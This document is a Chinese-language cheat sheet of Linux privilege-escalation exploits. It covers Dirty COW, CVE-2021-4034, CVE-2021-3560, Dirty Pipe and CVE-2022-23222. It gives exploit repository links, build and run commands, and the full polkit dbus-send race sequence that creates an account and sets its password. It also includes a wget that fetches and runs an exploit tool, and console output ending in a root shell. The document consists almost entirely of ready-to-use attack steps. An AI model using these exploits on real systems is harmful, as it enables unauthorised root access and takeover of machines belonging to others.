漏洞提权

Linux脏牛提权

https://github.com/FireFart/dirtycow
$gcc -pthread dirty.c -o dirty -lcrypt
$./dirty passwd 
生成账户密码
https://github.com/gbonacini/CVE-2016-5195
$make
$./dcow -s

CVE-2021-4034

https://github.com/berdav/CVE-2021-4034
只需执行 make，然后运行 ./cve-2021-4034 即可获得 root shell

CVE-2021-3560

先测量执行该命令所需的时间
>time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1
提前终止该命令（需要多运行几次）
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:ignite string:"ignite user" int32:1 & sleep 0.0035s ; kill $!
生成密码
>openssl passwd -5 ignite@123
执行（需要多运行几次）
>dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'$5$F2KwiUlWkn2i8DC.$rw9AOjKsmK83DhncqehVUzOKVqq.ArwS2G8eQKVntv7' string:BestHackingTutorials & sleep 0.0035s ; kill $!
>su ignite
>password: ignite@123
>whoami
>id
>sudo bash   # 获取 root

CVE-2022-0847

>wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
>./traitor-amd64 --exploit kernel:CVE-2022-0847
>whoami
>id

>git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
>cd CVE-2022-0847-DirtyPipe-Exploit
>./compile.sh
>./exploit

CVE-2022-23222

https://github.com/tr3ee/CVE-2022-23222
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit 
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
